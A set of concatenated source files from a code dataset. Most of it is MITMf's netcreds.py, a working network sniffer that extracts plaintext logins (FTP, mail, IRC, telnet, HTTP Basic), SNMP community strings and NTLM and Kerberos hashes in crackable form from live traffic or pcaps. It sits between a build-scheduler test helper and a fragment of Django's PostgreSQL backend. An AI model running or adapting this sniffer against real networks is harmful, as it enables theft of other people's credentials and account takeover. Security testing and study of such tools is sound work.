def mk_fs_tree(self, build_root_src=None, ignore_patterns=None, work_dir=None):
"""Create a temporary FilesystemProjectTree.
:param build_root_src: Optional directory to pre-populate from; otherwise, empty.
:returns: A FilesystemProjectTree.
"""
work_dir = work_dir or self._create_work_dir()
build_root = os.path.join(work_dir, 'build_root')
if build_root_src is not None:
shutil.copytree(build_root_src, build_root, symlinks=True)
else:
os.makedirs(build_root)
return FileSystemProjectTree(build_root, ignore_patterns=ignore_patterns)
def mk_scheduler(self,
rules=None,
union_rules=None,
project_tree=None,
work_dir=None,
include_trace_on_error=True):
"""Creates a SchedulerSession for a Scheduler with the given Rules installed."""
rules = rules or []
work_dir = work_dir or self._create_work_dir()
project_tree = project_tree or self.mk_fs_tree(work_dir=work_dir)
local_store_dir = os.path.realpath(safe_mkdtemp())
scheduler = Scheduler(self._native,
project_tree,
work_dir,
local_store_dir,
rules,
union_rules,
DEFAULT_EXECUTION_OPTIONS,
include_trace_on_error=include_trace_on_error)
return scheduler.new_session()
def context_with_scheduler(self, scheduler, *args, **kwargs):
return self.context(*args, scheduler=scheduler, **kwargs)
def execute(self, scheduler, product, *subjects):
"""Runs an ExecutionRequest for the given product and subjects, and returns the result value."""
request = scheduler.execution_request([product], subjects)
return self.execute_literal(scheduler, request)
def execute_literal(self, scheduler, execution_request):
returns, throws = scheduler.execute(execution_request)
if throws:
with temporary_file_path(cleanup=False, suffix='.dot') as dot_file:
scheduler.visualize_graph_to_file(dot_file)
raise ValueError('At least one root failed: {}. Visualized as {}'.format(throws, dot_file))
return list(state.value for _, state in returns)
def execute_expecting_one_result(self, scheduler, product, subject):
request = scheduler.execution_request([product], [subject])
returns, throws = scheduler.execute(request)
if throws:
_, state = throws[0]
raise state.exc
self.assertEqual(len(returns), 1)
_, state = returns[0]
return state
def execute_raising_throw(self, scheduler, product, subject):
resulting_value = self.execute_expecting_one_result(scheduler, product, subject)
self.assertTrue(type(resulting_value) is Throw)
raise resulting_value.exc
| apache-2.0 |
sunpeak/MITMf | core/netcreds.py | 3 | 33934 | import logging
import binascii
import struct
import base64
import threading
import binascii
from core.logger import logger
from os import geteuid, devnull
from sys import exit
from urllib import unquote
from collections import OrderedDict
from BaseHTTPServer import BaseHTTPRequestHandler
from StringIO import StringIO
from urllib import unquote
from scapy.all import *
conf.verb=0
formatter = logging.Formatter("%(asctime)s [NetCreds] %(message)s", datefmt="%Y-%m-%d %H:%M:%S")
log = logger().setup_logger("NetCreds", formatter)
DN = open(devnull, 'w')
pkt_frag_loads = OrderedDict()
challenge_acks = OrderedDict()
mail_auths = OrderedDict()
telnet_stream = OrderedDict()
# Regexs
authenticate_re = '(www-|proxy-)?authenticate'
authorization_re = '(www-|proxy-)?authorization'
ftp_user_re = r'USER (.+)\r\n'
ftp_pw_re = r'PASS (.+)\r\n'
irc_user_re = r'NICK (.+?)((\r)?\n|\s)'
irc_pw_re = r'NS IDENTIFY (.+)'
irc_pw_re2 = 'nickserv :identify (.+)'
mail_auth_re = '(\d+ )?(auth|authenticate) (login|plain)'
mail_auth_re1 = '(\d+ )?login '
NTLMSSP2_re = 'NTLMSSP\x00\x02\x00\x00\x00.+'
NTLMSSP3_re = 'NTLMSSP\x00\x03\x00\x00\x00.+'
# Prone to false+ but prefer that to false-
http_search_re = '((search|query|&q|\?q|search\?p|searchterm|keywords|keyword|command|terms|keys|question|kwd|searchPhrase)=([^&][^&]*))'
class NetCreds:
version = "1.0"
def sniffer(self, interface, ip):
try:
sniff(iface=interface, prn=pkt_parser, filter="not host {}".format(ip), store=0)
except Exception as e:
if "Interrupted system call" in e: pass
def start(self, interface, ip, pcap):
if pcap:
for pkt in PcapReader(pcap):
pkt_parser(pkt)
sys.exit()
else:
t = threading.Thread(name='NetCreds', target=self.sniffer, args=(interface, ip,))
t.setDaemon(True)
t.start()
def pkt_parser(pkt):
'''
Start parsing packets here
'''
global pkt_frag_loads, mail_auths
if pkt.haslayer(Raw):
load = pkt[Raw].load
# Get rid of Ethernet pkts with just a raw load cuz these are usually network controls like flow control
if pkt.haslayer(Ether) and pkt.haslayer(Raw) and not pkt.haslayer(IP) and not pkt.haslayer(IPv6):
return
# UDP
if pkt.haslayer(UDP) and pkt.haslayer(IP) and pkt.haslayer(Raw):
src_ip_port = str(pkt[IP].src) + ':' + str(pkt[UDP].sport)
dst_ip_port = str(pkt[IP].dst) + ':' + str(pkt[UDP].dport)
# SNMP community strings
if pkt.haslayer(SNMP):
parse_snmp(src_ip_port, dst_ip_port, pkt[SNMP])
return
# Kerberos over UDP
decoded = Decode_Ip_Packet(str(pkt)[14:])
kerb_hash = ParseMSKerbv5UDP(decoded['data'][8:])
if kerb_hash:
printer(src_ip_port, dst_ip_port, kerb_hash)
# TCP
elif pkt.haslayer(TCP) and pkt.haslayer(Raw) and pkt.haslayer(IP):
ack = str(pkt[TCP].ack)
seq = str(pkt[TCP].seq)
src_ip_port = str(pkt[IP].src) + ':' + str(pkt[TCP].sport)
dst_ip_port = str(pkt[IP].dst) + ':' + str(pkt[TCP].dport)
frag_remover(ack, load)
pkt_frag_loads[src_ip_port] = frag_joiner(ack, src_ip_port, load)
full_load = pkt_frag_loads[src_ip_port][ack]
# Limit the packets we regex to increase efficiency
# 750 is a bit arbitrary but some SMTP auth success pkts
# are 500+ characters
if 0 < len(full_load) < 750:
# FTP
ftp_creds = parse_ftp(full_load, dst_ip_port)
if len(ftp_creds) > 0:
for msg in ftp_creds:
printer(src_ip_port, dst_ip_port, msg)
return
# Mail
mail_creds_found = mail_logins(full_load, src_ip_port, dst_ip_port, ack, seq)
# IRC
irc_creds = irc_logins(full_load, pkt)
if irc_creds != None:
printer(src_ip_port, dst_ip_port, irc_creds)
return
# Telnet
telnet_logins(src_ip_port, dst_ip_port, load, ack, seq)
# HTTP and other protocols that run on TCP + a raw load
other_parser(src_ip_port, dst_ip_port, full_load, ack, seq, pkt)
def frag_remover(ack, load):
'''
Keep the FILO OrderedDict of frag loads from getting too large
3 points of limit:
Number of ip_ports < 50
Number of acks per ip:port < 25
Number of chars in load < 5000
'''
global pkt_frag_loads
# Keep the number of IP:port mappings below 50
# last=False pops the oldest item rather than the latest
while len(pkt_frag_loads) > 50:
pkt_frag_loads.popitem(last=False)
# Loop through a deep copy dict but modify the original dict
copy_pkt_frag_loads = copy.deepcopy(pkt_frag_loads)
for ip_port in copy_pkt_frag_loads:
if len(copy_pkt_frag_loads[ip_port]) > 0:
# Keep 25 ack:load's per ip:port
while len(copy_pkt_frag_loads[ip_port]) > 25:
pkt_frag_loads[ip_port].popitem(last=False)
# Recopy the new dict to prevent KeyErrors for modifying dict in loop
copy_pkt_frag_loads = copy.deepcopy(pkt_frag_loads)
for ip_port in copy_pkt_frag_loads:
# Keep the load less than 75,000 chars
for ack in copy_pkt_frag_loads[ip_port]:
# If load > 5000 chars, just keep the last 200 chars
if len(copy_pkt_frag_loads[ip_port][ack]) > 5000:
pkt_frag_loads[ip_port][ack] = pkt_frag_loads[ip_port][ack][-200:]
def frag_joiner(ack, src_ip_port, load):
'''
Keep a store of previous fragments in an OrderedDict named pkt_frag_loads
'''
for ip_port in pkt_frag_loads:
if src_ip_port == ip_port:
if ack in pkt_frag_loads[src_ip_port]:
# Make pkt_frag_loads[src_ip_port][ack] = full load
old_load = pkt_frag_loads[src_ip_port][ack]
concat_load = old_load + load
return OrderedDict([(ack, concat_load)])
return OrderedDict([(ack, load)])
def telnet_logins(src_ip_port, dst_ip_port, load, ack, seq):
'''
Catch telnet logins and passwords
'''
global telnet_stream
msg = None
if src_ip_port in telnet_stream:
# Do a utf decode in case the client sends telnet options before their username
# No one would care to see that
try:
telnet_stream[src_ip_port] += load.decode('utf8')
except UnicodeDecodeError:
pass
# \r or \r\n or \n terminate commands in telnet if my pcaps are to be believed
if '\r' in telnet_stream[src_ip_port] or '\n' in telnet_stream[src_ip_port]:
telnet_split = telnet_stream[src_ip_port].split(' ', 1)
cred_type = telnet_split[0]
value = telnet_split[1].replace('\r\n', '').replace('\r', '').replace('\n', '')
# Create msg, the return variable
msg = 'Telnet %s: %s' % (cred_type, value)
printer(src_ip_port, dst_ip_port, msg)
del telnet_stream[src_ip_port]
# This part relies on the telnet packet ending in
# "login:", "password:", or "username:" and being <750 chars
# Haven't seen any false+ but this is pretty general
# might catch some eventually
# maybe use dissector.py telnet lib?
if len(telnet_stream) > 100:
telnet_stream.popitem(last=False)
mod_load = load.lower().strip()
if mod_load.endswith('username:') or mod_load.endswith('login:'):
telnet_stream[dst_ip_port] = 'username '
elif mod_load.endswith('password:'):
telnet_stream[dst_ip_port] = 'password '
def ParseMSKerbv5TCP(Data):
'''
Taken from Pcredz because I didn't want to spend the time doing this myself
I should probably figure this out on my own but hey, time isn't free, why reinvent the wheel?
Maybe replace this eventually with the kerberos python lib
Parses Kerberosv5 hashes from packets
'''
try:
MsgType = Data[21:22]
EncType = Data[43:44]
MessageType = Data[32:33]
except IndexError:
return
if MsgType == "\x0a" and EncType == "\x17" and MessageType =="\x02":
if Data[49:53] == "\xa2\x36\x04\x34" or Data[49:53] == "\xa2\x35\x04\x33":
HashLen = struct.unpack('<b',Data[50:51])[0]
if HashLen == 54:
Hash = Data[53:105]
SwitchHash = Hash[16:]+Hash[0:16]
NameLen = struct.unpack('<b',Data[153:154])[0]
Name = Data[154:154+NameLen]
DomainLen = struct.unpack('<b',Data[154+NameLen+3:154+NameLen+4])[0]
Domain = Data[154+NameLen+4:154+NameLen+4+DomainLen]
BuildHash = "$krb5pa$23$"+Name+"$"+Domain+"$dummy$"+SwitchHash.encode('hex')
return 'MS Kerberos: %s' % BuildHash
if Data[44:48] == "\xa2\x36\x04\x34" or Data[44:48] == "\xa2\x35\x04\x33":
HashLen = struct.unpack('<b',Data[47:48])[0]
Hash = Data[48:48+HashLen]
SwitchHash = Hash[16:]+Hash[0:16]
NameLen = struct.unpack('<b',Data[HashLen+96:HashLen+96+1])[0]
Name = Data[HashLen+97:HashLen+97+NameLen]
DomainLen = struct.unpack('<b',Data[HashLen+97+NameLen+3:HashLen+97+NameLen+4])[0]
Domain = Data[HashLen+97+NameLen+4:HashLen+97+NameLen+4+DomainLen]
BuildHash = "$krb5pa$23$"+Name+"$"+Domain+"$dummy$"+SwitchHash.encode('hex')
return 'MS Kerberos: %s' % BuildHash
else:
Hash = Data[48:100]
SwitchHash = Hash[16:]+Hash[0:16]
NameLen = struct.unpack('<b',Data[148:149])[0]
Name = Data[149:149+NameLen]
DomainLen = struct.unpack('<b',Data[149+NameLen+3:149+NameLen+4])[0]
Domain = Data[149+NameLen+4:149+NameLen+4+DomainLen]
BuildHash = "$krb5pa$23$"+Name+"$"+Domain+"$dummy$"+SwitchHash.encode('hex')
return 'MS Kerberos: %s' % BuildHash
def ParseMSKerbv5UDP(Data):
'''
Taken from Pcredz because I didn't want to spend the time doing this myself
I should probably figure this out on my own but hey, time isn't free why reinvent the wheel?
Maybe replace this eventually with the kerberos python lib
Parses Kerberosv5 hashes from packets
'''
try:
MsgType = Data[17:18]
EncType = Data[39:40]
except IndexError:
return
if MsgType == "\x0a" and EncType == "\x17":
try:
if Data[40:44] == "\xa2\x36\x04\x34" or Data[40:44] == "\xa2\x35\x04\x33":
HashLen = struct.unpack('<b',Data[41:42])[0]
if HashLen == 54:
Hash = Data[44:96]
SwitchHash = Hash[16:]+Hash[0:16]
NameLen = struct.unpack('<b',Data[144:145])[0]
Name = Data[145:145+NameLen]
DomainLen = struct.unpack('<b',Data[145+NameLen+3:145+NameLen+4])[0]
Domain = Data[145+NameLen+4:145+NameLen+4+DomainLen]
BuildHash = "$krb5pa$23$"+Name+"$"+Domain+"$dummy$"+SwitchHash.encode('hex')
return 'MS Kerberos: %s' % BuildHash
if HashLen == 53:
Hash = Data[44:95]
SwitchHash = Hash[16:]+Hash[0:16]
NameLen = struct.unpack('<b',Data[143:144])[0]
Name = Data[144:144+NameLen]
DomainLen = struct.unpack('<b',Data[144+NameLen+3:144+NameLen+4])[0]
Domain = Data[144+NameLen+4:144+NameLen+4+DomainLen]
BuildHash = "$krb5pa$23$"+Name+"$"+Domain+"$dummy$"+SwitchHash.encode('hex')
return 'MS Kerberos: %s' % BuildHash
else:
HashLen = struct.unpack('<b',Data[48:49])[0]
Hash = Data[49:49+HashLen]
SwitchHash = Hash[16:]+Hash[0:16]
NameLen = struct.unpack('<b',Data[HashLen+97:HashLen+97+1])[0]
Name = Data[HashLen+98:HashLen+98+NameLen]
DomainLen = struct.unpack('<b',Data[HashLen+98+NameLen+3:HashLen+98+NameLen+4])[0]
Domain = Data[HashLen+98+NameLen+4:HashLen+98+NameLen+4+DomainLen]
BuildHash = "$krb5pa$23$"+Name+"$"+Domain+"$dummy$"+SwitchHash.encode('hex')
return 'MS Kerberos: %s' % BuildHash
except struct.error:
return
def Decode_Ip_Packet(s):
'''
Taken from PCredz, solely to get Kerb parsing
working until I have time to analyze Kerb pkts
and figure out a simpler way
Maybe use kerberos python lib
'''
d={}
d['header_len']=ord(s[0]) & 0x0f
d['data']=s[4*d['header_len']:]
return d
def double_line_checker(full_load, count_str):
'''
Check if count_str shows up twice
'''
num = full_load.lower().count(count_str)
if num > 1:
lines = full_load.count('\r\n')
if lines > 1:
full_load = full_load.split('\r\n')[-2] # -1 is ''
return full_load
def parse_ftp(full_load, dst_ip_port):
'''
Parse out FTP creds
'''
print_strs = []
# Sometimes FTP packets double up on the authentication lines
# We just want the lastest one. Ex: "USER danmcinerney\r\nUSER danmcinerney\r\n"
full_load = double_line_checker(full_load, 'USER')
# FTP and POP potentially use idential client > server auth pkts
ftp_user = re.match(ftp_user_re, full_load)
ftp_pass = re.match(ftp_pw_re, full_load)
if ftp_user:
msg1 = 'FTP User: %s' % ftp_user.group(1).strip()
print_strs.append(msg1)
if dst_ip_port[-3:] != ':21':
msg2 = 'Nonstandard FTP port, confirm the service that is running on it'
print_strs.append(msg2)
elif ftp_pass:
msg1 = 'FTP Pass: %s' % ftp_pass.group(1).strip()
print_strs.append(msg1)
if dst_ip_port[-3:] != ':21':
msg2 = 'Nonstandard FTP port, confirm the service that is running on it'
print_strs.append(msg2)
return print_strs
def mail_decode(src_ip_port, dst_ip_port, mail_creds):
'''
Decode base64 mail creds
'''
try:
decoded = base64.b64decode(mail_creds).replace('\x00', ' ').decode('utf8')
decoded = decoded.replace('\x00', ' ')
except TypeError:
decoded = None
except UnicodeDecodeError as e:
decoded = None
if decoded != None:
msg = 'Decoded: %s' % decoded
printer(src_ip_port, dst_ip_port, msg)
def mail_logins(full_load, src_ip_port, dst_ip_port, ack, seq):
'''
Catch IMAP, POP, and SMTP logins
'''
# Handle the first packet of mail authentication
# if the creds aren't in the first packet, save it in mail_auths
# mail_auths = 192.168.0.2 : [1st ack, 2nd ack...]
global mail_auths
found = False
# Sometimes mail packets double up on the authentication lines
# We just want the lastest one. Ex: "1 auth plain\r\n2 auth plain\r\n"
full_load = double_line_checker(full_load, 'auth')
# Client to server 2nd+ pkt
if src_ip_port in mail_auths:
if seq in mail_auths[src_ip_port][-1]:
stripped = full_load.strip('\r\n')
try:
decoded = base64.b64decode(stripped)
msg = 'Mail authentication: %s' % decoded
printer(src_ip_port, dst_ip_port, msg)
except TypeError:
pass
mail_auths[src_ip_port].append(ack)
# Server responses to client
# seq always = last ack of tcp stream
elif dst_ip_port in mail_auths:
if seq in mail_auths[dst_ip_port][-1]:
# Look for any kind of auth failure or success
a_s = 'Authentication successful'
a_f = 'Authentication failed'
# SMTP auth was successful
if full_load.startswith('235') and 'auth' in full_load.lower():
# Reversed the dst and src
printer(dst_ip_port, src_ip_port, a_s)
found = True
try:
del mail_auths[dst_ip_port]
except KeyError:
pass
# SMTP failed
elif full_load.startswith('535 '):
# Reversed the dst and src
printer(dst_ip_port, src_ip_port, a_f)
found = True
try:
del mail_auths[dst_ip_port]
except KeyError:
pass
# IMAP/POP/SMTP failed
elif ' fail' in full_load.lower():
# Reversed the dst and src
printer(dst_ip_port, src_ip_port, a_f)
found = True
try:
del mail_auths[dst_ip_port]
except KeyError:
pass
# IMAP auth success
elif ' OK [' in full_load:
# Reversed the dst and src
printer(dst_ip_port, src_ip_port, a_s)
found = True
try:
del mail_auths[dst_ip_port]
except KeyError:
pass
# Pkt was not an auth pass/fail so its just a normal server ack
# that it got the client's first auth pkt
else:
if len(mail_auths) > 100:
mail_auths.popitem(last=False)
mail_auths[dst_ip_port].append(ack)
# Client to server but it's a new TCP seq
# This handles most POP/IMAP/SMTP logins but there's at least one edge case
else:
mail_auth_search = re.match(mail_auth_re, full_load, re.IGNORECASE)
if mail_auth_search != None:
auth_msg = full_load
# IMAP uses the number at the beginning
if mail_auth_search.group(1) != None:
auth_msg = auth_msg.split()[1:]
else:
auth_msg = auth_msg.split()
# Check if its a pkt like AUTH PLAIN dvcmQxIQ==
# rather than just an AUTH PLAIN
if len(auth_msg) > 2:
mail_creds = ' '.join(auth_msg[2:])
msg = 'Mail authentication: %s' % mail_creds
printer(src_ip_port, dst_ip_port, msg)
mail_decode(src_ip_port, dst_ip_port, mail_creds)
try:
del mail_auths[src_ip_port]
except KeyError:
pass
found = True
# Mail auth regex was found and src_ip_port is not in mail_auths
# Pkt was just the initial auth cmd, next pkt from client will hold creds
if len(mail_auths) > 100:
mail_auths.popitem(last=False)
mail_auths[src_ip_port] = [ack]
# At least 1 mail login style doesn't fit in the original regex:
# 1 login "username" "password"
# This also catches FTP authentication!
# 230 Login successful.
elif re.match(mail_auth_re1, full_load, re.IGNORECASE) != None:
# FTP authentication failures trigger this
#if full_load.lower().startswith('530 login'):
# return
auth_msg = full_load
auth_msg = auth_msg.split()
if 2 < len(auth_msg) < 5:
mail_creds = ' '.join(auth_msg[2:])
msg = 'Authentication: %s' % mail_creds
printer(src_ip_port, dst_ip_port, msg)
mail_decode(src_ip_port, dst_ip_port, mail_creds)
found = True
if found == True:
return True
def irc_logins(full_load, pkt):
'''
Find IRC logins
'''
user_search = re.match(irc_user_re, full_load)
pass_search = re.match(irc_pw_re, full_load)
pass_search2 = re.search(irc_pw_re2, full_load.lower())
if user_search:
msg = 'IRC nick: %s' % user_search.group(1)
return msg
if pass_search:
msg = 'IRC pass: %s' % pass_search.group(1)
return msg
if pass_search2:
msg = 'IRC pass: %s' % pass_search2.group(1)
return msg
def other_parser(src_ip_port, dst_ip_port, full_load, ack, seq, pkt):
'''
Pull out pertinent info from the parsed HTTP packet data
'''
user_passwd = None
http_url_req = None
method = None
http_methods = ['GET ', 'POST', 'CONNECT ', 'TRACE ', 'TRACK ', 'PUT ', 'DELETE ', 'HEAD ']
http_line, header_lines, body = parse_http_load(full_load, http_methods)
headers = headers_to_dict(header_lines)
if 'host' in headers:
host = headers['host']
else:
host = ''
#if http_line != None:
# method, path = parse_http_line(http_line, http_methods)
# http_url_req = get_http_url(method, host, path, headers)
#if http_url_req != None:
#printer(src_ip_port, None, http_url_req)
# Print search terms
searched = get_http_searches(http_url_req, body, host)
if searched:
printer(src_ip_port, dst_ip_port, searched)
#We dont need this cause its being taking care of by the proxy
#Print user/pwds
#if body != '':
# user_passwd = get_login_pass(body)
# if user_passwd != None:
# try:
# http_user = user_passwd[0].decode('utf8')
# http_pass = user_passwd[1].decode('utf8')
# # Set a limit on how long they can be prevent false+
# if len(http_user) > 75 or len(http_pass) > 75:
# return
# user_msg = 'HTTP username: %s' % http_user
# printer(src_ip_port, dst_ip_port, user_msg)
# pass_msg = 'HTTP password: %s' % http_pass
# printer(src_ip_port, dst_ip_port, pass_msg)
# except UnicodeDecodeError:
# pass
# Print POST loads
# ocsp is a common SSL post load that's never interesting
#if method == 'POST' and 'ocsp.' not in host:
# try:
# msg = 'POST load: %s' % body.encode('utf8')
# printer(src_ip_port, None, msg)
# except UnicodeDecodeError:
# pass
# Kerberos over TCP
decoded = Decode_Ip_Packet(str(pkt)[14:])
kerb_hash = ParseMSKerbv5TCP(decoded['data'][20:])
if kerb_hash:
printer(src_ip_port, dst_ip_port, kerb_hash)
# Non-NETNTLM NTLM hashes (MSSQL, DCE-RPC,SMBv1/2,LDAP, MSSQL)
NTLMSSP2 = re.search(NTLMSSP2_re, full_load, re.DOTALL)
NTLMSSP3 = re.search(NTLMSSP3_re, full_load, re.DOTALL)
if NTLMSSP2:
parse_ntlm_chal(NTLMSSP2.group(), ack)
if NTLMSSP3:
ntlm_resp_found = parse_ntlm_resp(NTLMSSP3.group(), seq)
if ntlm_resp_found != None:
printer(src_ip_port, dst_ip_port, ntlm_resp_found)
# Look for authentication headers
if len(headers) == 0:
authenticate_header = None
authorization_header = None
for header in headers:
authenticate_header = re.match(authenticate_re, header)
authorization_header = re.match(authorization_re, header)
if authenticate_header or authorization_header:
break
if authorization_header or authenticate_header:
# NETNTLM
netntlm_found = parse_netntlm(authenticate_header, authorization_header, headers, ack, seq)
if netntlm_found != None:
printer(src_ip_port, dst_ip_port, netntlm_found)
# Basic Auth
parse_basic_auth(src_ip_port, dst_ip_port, headers, authorization_header)
def get_http_searches(http_url_req, body, host):
'''
Find search terms from URLs. Prone to false positives but rather err on that side than false negatives
search, query, ?s, &q, ?q, search?p, searchTerm, keywords, command
'''
false_pos = ['i.stack.imgur.com']
searched = None
if http_url_req != None:
searched = re.search(http_search_re, http_url_req, re.IGNORECASE)
if searched == None:
searched = re.search(http_search_re, body, re.IGNORECASE)
if searched != None and host not in false_pos:
searched = searched.group(3)
# Eliminate some false+
try:
# if it doesn't decode to utf8 it's probably not user input
searched = searched.decode('utf8')
except UnicodeDecodeError:
return
# some add sites trigger this function with single digits
if searched in [str(num) for num in range(0,10)]:
return
# nobody's making >100 character searches
if len(searched) > 100:
return
msg = 'Searched %s: %s' % (host, unquote(searched.encode('utf8')).replace('+', ' '))
return msg
def parse_basic_auth(src_ip_port, dst_ip_port, headers, authorization_header):
'''
Parse basic authentication over HTTP
'''
if authorization_header:
# authorization_header sometimes is triggered by failed ftp
try:
header_val = headers[authorization_header.group()]
except KeyError:
return
b64_auth_re = re.match('basic (.+)', header_val, re.IGNORECASE)
if b64_auth_re != None:
basic_auth_b64 = b64_auth_re.group(1)
basic_auth_creds = base64.decodestring(basic_auth_b64)
msg = 'Basic Authentication: %s' % basic_auth_creds
printer(src_ip_port, dst_ip_port, msg)
def parse_netntlm(authenticate_header, authorization_header, headers, ack, seq):
'''
Parse NTLM hashes out
'''
# Type 2 challenge from server
if authenticate_header != None:
chal_header = authenticate_header.group()
parse_netntlm_chal(headers, chal_header, ack)
# Type 3 response from client
elif authorization_header != None:
resp_header = authorization_header.group()
msg = parse_netntlm_resp_msg(headers, resp_header, seq)
if msg != None:
return msg
def parse_snmp(src_ip_port, dst_ip_port, snmp_layer):
'''
Parse out the SNMP version and community string
'''
if type(snmp_layer.community.val) == str:
ver = snmp_layer.version.val
msg = 'SNMPv%d community string: %s' % (ver, snmp_layer.community.val)
printer(src_ip_port, dst_ip_port, msg)
return True
def get_http_url(method, host, path, headers):
'''
Get the HTTP method + URL from requests
'''
if method != None and path != None:
# Make sure the path doesn't repeat the host header
if host != '' and not re.match('(http(s)?://)?'+host, path):
http_url_req = method + ' ' + host + path
else:
http_url_req = method + ' ' + path
http_url_req = url_filter(http_url_req)
return http_url_req
def headers_to_dict(header_lines):
'''
Convert the list of header lines into a dictionary
'''
headers = {}
# Incomprehensible list comprehension flattens list of headers
# that are each split at ': '
# http://stackoverflow.com/a/406296
headers_list = [x for line in header_lines for x in line.split(': ', 1)]
headers_dict = dict(zip(headers_list[0::2], headers_list[1::2]))
# Make the header key (like "Content-Length") lowercase
for header in headers_dict:
headers[header.lower()] = headers_dict[header]
return headers
def parse_http_line(http_line, http_methods):
'''
Parse the header with the HTTP method in it
'''
http_line_split = http_line.split()
method = ''
path = ''
# Accounts for pcap files that might start with a fragment
# so the first line might be just text data
if len(http_line_split) > 1:
method = http_line_split[0]
path = http_line_split[1]
# This check exists because responses are much different than requests e.g.:
# HTTP/1.1 407 Proxy Authentication Required ( Access is denied. )
# Add a space to method because there's a space in http_methods items
# to avoid false+
if method+' ' not in http_methods:
method = None
path = None
return method, path
def parse_http_load(full_load, http_methods):
'''
Split the raw load into list of headers and body string
'''
try:
headers, body = full_load.split("\r\n\r\n", 1)
except ValueError:
headers = full_load
body = ''
header_lines = headers.split("\r\n")
# Pkts may just contain hex data and no headers in which case we'll
# still want to parse them for usernames and password
http_line = get_http_line(header_lines, http_methods)
if not http_line:
headers = ''
body = full_load
header_lines = [line for line in header_lines if line != http_line]
return http_line, header_lines, body
def get_http_line(header_lines, http_methods):
'''
Get the header with the http command
'''
for header in header_lines:
for method in http_methods:
# / is the only char I can think of that's in every http_line
# Shortest valid: "GET /", add check for "/"?
if header.startswith(method):
http_line = header
return http_line
def parse_netntlm_chal(headers, chal_header, ack):
'''
Parse the netntlm server challenge
https://code.google.com/p/python-ntlm/source/browse/trunk/python26/ntlm/ntlm.py
'''
try:
header_val2 = headers[chal_header]
except KeyError:
return
header_val2 = header_val2.split(' ', 1)
# The header value can either start with NTLM or Negotiate
if header_val2[0] == 'NTLM' or header_val2[0] == 'Negotiate':
msg2 = header_val2[1]
msg2 = base64.decodestring(msg2)
parse_ntlm_chal(ack, msg2)
def parse_ntlm_chal(msg2, ack):
'''
Parse server challenge
'''
global challenge_acks
Signature = msg2[0:8]
try:
msg_type = struct.unpack("<I",msg2[8:12])[0]
except Exception:
return
assert(msg_type==2)
ServerChallenge = msg2[24:32].encode('hex')
# Keep the dict of ack:challenge to less than 50 chals
if len(challenge_acks) > 50:
challenge_acks.popitem(last=False)
challenge_acks[ack] = ServerChallenge
def parse_netntlm_resp_msg(headers, resp_header, seq):
'''
Parse the client response to the challenge
'''
try:
header_val3 = headers[resp_header]
except KeyError:
return
header_val3 = header_val3.split(' ', 1)
# The header value can either start with NTLM or Negotiate
if header_val3[0] == 'NTLM' or header_val3[0] == 'Negotiate':
try:
msg3 = base64.decodestring(header_val3[1])
except binascii.Error:
return
return parse_ntlm_resp(msg3, seq)
def parse_ntlm_resp(msg3, seq):
'''
Parse the 3rd msg in NTLM handshake
Thanks to psychomario
'''
if seq in challenge_acks:
challenge = challenge_acks[seq]
else:
challenge = 'CHALLENGE NOT FOUND'
if len(msg3) > 43:
# Thx to psychomario for below
lmlen, lmmax, lmoff, ntlen, ntmax, ntoff, domlen, dommax, domoff, userlen, usermax, useroff = struct.unpack("12xhhihhihhihhi", msg3[:44])
lmhash = binascii.b2a_hex(msg3[lmoff:lmoff+lmlen])
nthash = binascii.b2a_hex(msg3[ntoff:ntoff+ntlen])
domain = msg3[domoff:domoff+domlen].replace("\0", "")
user = msg3[useroff:useroff+userlen].replace("\0", "")
# Original check by psychomario, might be incorrect?
#if lmhash != "0"*48: #NTLMv1
if ntlen == 24: #NTLMv1
msg = '%s %s' % ('NETNTLMv1:', user+"::"+domain+":"+lmhash+":"+nthash+":"+challenge)
return msg
elif ntlen > 60: #NTLMv2
msg = '%s %s' % ('NETNTLMv2:', user+"::"+domain+":"+challenge+":"+nthash[:32]+":"+nthash[32:])
return msg
def url_filter(http_url_req):
'''
Filter out the common but uninteresting URLs
'''
if http_url_req:
d = ['.jpg', '.jpeg', '.gif', '.png', '.css', '.ico', '.js', '.svg', '.woff']
if any(http_url_req.endswith(i) for i in d):
return
return http_url_req
def get_login_pass(body):
'''
Regex out logins and passwords from a string
'''
user = None
passwd = None
# Taken mainly from Pcredz by Laurent Gaffie
userfields = ['log','login', 'wpname', 'ahd_username', 'unickname', 'nickname', 'user', 'user_name',
'alias', 'pseudo', 'email', 'username', '_username', 'userid', 'form_loginname', 'loginname',
'login_id', 'loginid', 'session_key', 'sessionkey', 'pop_login', 'uid', 'id', 'user_id', 'screename',
'uname', 'ulogin', 'acctname', 'account', 'member', 'mailaddress', 'membername', 'login_username',
'login_email', 'loginusername', 'loginemail', 'uin', 'sign-in']
passfields = ['ahd_password', 'pass', 'password', '_password', 'passwd', 'session_password', 'sessionpassword',
'login_password', 'loginpassword', 'form_pw', 'pw', 'userpassword', 'pwd', 'upassword', 'login_password'
'passwort', 'passwrd', 'wppassword', 'upasswd']
for login in userfields:
login_re = re.search('(%s=[^&]+)' % login, body, re.IGNORECASE)
if login_re:
user = login_re.group()
for passfield in passfields:
pass_re = re.search('(%s=[^&]+)' % passfield, body, re.IGNORECASE)
if pass_re:
passwd = pass_re.group()
if user and passwd:
return (user, passwd)
def printer(src_ip_port, dst_ip_port, msg):
if dst_ip_port != None:
print_str = '[{} > {}] {}'.format(src_ip_port, dst_ip_port, msg)
# All credentials will have dst_ip_port, URLs will not
log.info("{}".format(print_str))
else:
print_str = '[{}] {}'.format(src_ip_port.split(':')[0], msg)
log.info("{}".format(print_str))
| gpl-3.0 |
beezee/GAE-Django-base-app | django/db/backends/postgresql/operations.py | 229 | 9420 | import re
from django.db.backends import BaseDatabaseOperations
# This DatabaseOperations class lives in here instead of base.py because it's
# used by both the 'postgresql' and 'postgresql_psycopg2' backends.
class DatabaseOperations(BaseDatabaseOperations):
def __init__(self, connection):
super(DatabaseOperations, self).__init__()
self._postgres_version = None
self.connection = connection
def _get_postgres_version(self):
if self._postgres_version is None:
from django.db.backends.postgresql.version import get_version
cursor = self.connection.cursor()
self._postgres_version = get_version(cursor)
return self._postgres_version
postgres_version = property(_get_postgres_version)
def date_extract_sql(self, lookup_type, field_name):
# http://www.postgresql.org/docs/8.0/static/functions-datetime.html#FUNCTIONS-DATETIME-EXTRACT
if lookup_type == 'week_day':
# For consistency across backends, we return Sunday=1, Saturday=7.
return "EXTRACT('dow' FROM %s) + 1" % field_name
else:
return "EXTRACT('%s' FROM %s)" % (lookup_type, field_name)
def date_interval_sql(self, sql, connector, timedelta):
"""
implements the interval functionality for expressions
format for Postgres:
(datefield + interval '3 days 200 seconds 5 microseconds')
